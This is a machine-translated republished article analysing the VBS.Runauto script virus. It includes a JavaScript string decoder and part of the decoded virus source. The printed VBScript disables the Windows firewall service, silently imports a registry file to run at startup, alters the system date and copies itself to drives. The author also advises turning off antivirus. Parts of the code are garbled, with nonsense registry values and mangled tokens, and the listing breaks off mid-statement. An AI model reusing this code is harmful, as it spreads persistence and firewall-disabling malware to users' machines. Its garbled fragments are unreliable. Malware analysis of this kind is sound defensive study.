Shulou(Shulou.com)06/03 Report--

This article shares with you the content of a sample analysis of VBS.Runauto scripting viruses. The editor thinks it is very practical, so share it with you as a reference and follow the editor to have a look.

Recently, a colleague's notebook encountered this virus, which happened to be on VBscript for computer majors this semester, so I analyzed it by the way.

First of all, the virus sample was extracted from the infected computer, and since it was temporarily discovered, there was no special preparation, so it was compressed with winrar and saved.

When I opened the compressed file of the virus sample on the experimental machine, my Symantec 11 immediately called the police and deleted the virus. So you have to disable antivirus software or set up an "exception area" to analyze viruses, so create a new "evA" folder on your desktop and set it as an antivirus exception folder, so the virus samples lie quietly inside.

Script viruses are interpreted programs, so we don't need any special decompilation tools to view the source code. Although Windows's notepad is enough, I still like to use UltraEdit.

Use Open UltraEdit to open the virus file as shown in figure 1. Note that in order to prevent the virus from being triggered by mistake, change the vbs extension to txt first.

Figure 1 virus script

Open the virus script, you can find that the readability of the code is very poor, messy arrangement of uppercase and lowercase letters, and there are a lot of incomprehensible symbol strings. In fact, this is the "umbrella" that the virus "wants" to preserve itself.

Virus code case problems can be used to select text in UE (later UltraEdit abbreviation) and convert it directly to lowercase letters using Ctrl+F5. For "00c233%" similar to the password. " Is relatively troublesome.

From the virus code, we can find that whenever there is "garbled", there will be calls to "STrREVeRSE" and "unEscaPE" functions, in which "unescape" is the standard function of vbscript, which is used to decode the string encoded by the escape function. It needs to be noted here that because Html in Web is reserved for some symbols, such as the "" symbol, if you need to display these symbols, you need to encode them with html, and all spaces, punctuation, accents, and other non-ASCII characters are replaced by% xx encoding, where xx equals the hexadecimal number that represents the character. For example, the space returns "% 20". Characters with values greater than 255, such as Chinese, are stored in% uxxxx format. In the analysis of "password", it is found that the symbol string encoded by escape is reversed, and combined with the name of "STrREVeRSE" function, it can be concluded that in order to make the virus escape the detection of antivirus software, the virus author adopts the way of coding and reverse storage of the key code.

You can encode and decode strings directly in UE, but there is no ready-made tool for mirroring strings. Recently, students are being given JavaScript, and a page is written to decode or encode them. Although it is very simple, for the sake of narrative continuity, the code is as follows:

The copy code is as follows:

Change the string Reverse

Function _ reverse ()

{

With (document) {

If (rev.order.checked) {

Revedstr = rev.instr.value.split (''). Reverse (). Join ('')

Write ("reversed string:", revedstr, "

")

Write ("unescape string:", unescape (revedstr), "

")

Write ("escape string:", escape (revedstr), "

")

}

Else {

Unescapstr = unescape (rev.instr.value)

Revedstr = unescapstr.split (''). Reverse (). Join ('')

Write ("uneacape string:", unescapstr, "")

Write ("reversed string:", revedstr)

}

}

}

Conversion order (reverse first and then decode)?

Use the above tools to decode the code as follows:

The copy code is as follows:

On Error Resume Next

Set fso=CreateObject ("scripting.filesystemobject")

Set wshshell=CreateObject (strreverse ("wscript.shell"))

Dim dri_list,dri_list0

Dim issend

Issend=0

C_time=Date ()

'This is to turn off SharedAccess (Intemet connection sharing and firewall services).

Wshshell.run "net stop sharedaccess", 0

Set drvs=fso.drives

Sysdir=fso.GetSpecialFolder (1) 'WindowsFolder=0,SystemFolder=1, TemporaryFolder=2

Thispath=wscript.ScriptFullName

Set fc=fso.OpenTextFile (thispath,1) 'ForReading=1,ForWriting=2, ForAppending=8

Scopy=fc.readall

Fc.Close

Set fc=Nothing

'write the registry registration file sysinfo.reg, and the registration system starts to execute the virus automatically.

Call writefile (sysdir& "\ sysinfo.reg" "windows registry editor version 5.00 [hkey_local_machine\ software\ policies\ microsoft\ windows\ system\ scripts\ startup\ 0\ 0]" script "="% windir%\\ system32\\ prncfg.vbs "" parameters "="exectime" = hex (b): 00meme 0000meme 0000pr 0000pcmc00pcml00pr 0000pcmc00pc00pc00pr [hkey_local_machine\ software\ microsoft\ windows\ currentversion\ group policy\ state\ machine\ scripts\ startup\ 0] "script" = "% windir%\\ system32\ prncfg.vbs"parameters" = "exectime" = hex (b): 00pcml00pr 00pr 00pr 00pr

")

'Import registry sysinfo.reg

Wshshell.run "regedit / s sysinfo.reg", 0

Wscript.sleep 200

Fso.deletefile sysdir& "\ sysinfo.reg", True

'if the currently running script is in the system directory

If InStr (thispath,sysdir) > 0 Then

Dri_list0=listdrv ()

O_time=left (c_time 3) & cstr (Int (Mid))-1) & Right (Len (c_time)-4) 'callback time 1 year

Wshshell.run "cmd / c Date" & oasis timeline 0

Wscript.sleep 10000

For dri_i=1 to Len (dri_list0)

Call writeauto (Mid (dri_list0,dri_i,1) & ":\")

Next

Wshshell.run "cmd / c Date" & clocktimejin0

'The WMI App queries the computer name and user name

Computername= "": username= ""

Set objwmiservice=GetObject ("winmgmts: {impersonationlevel=impersonate}!\.\ root\ cimv2")

Set colcomputers = objwmiservice.execquery ("select * from win32_computersystem")

For Each objcomputer in colcomputers

Computername=objcomputer.name

Username=objcomputer.username

Next

If username= "" Then username= "evar"

If InStr (username, "\")

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.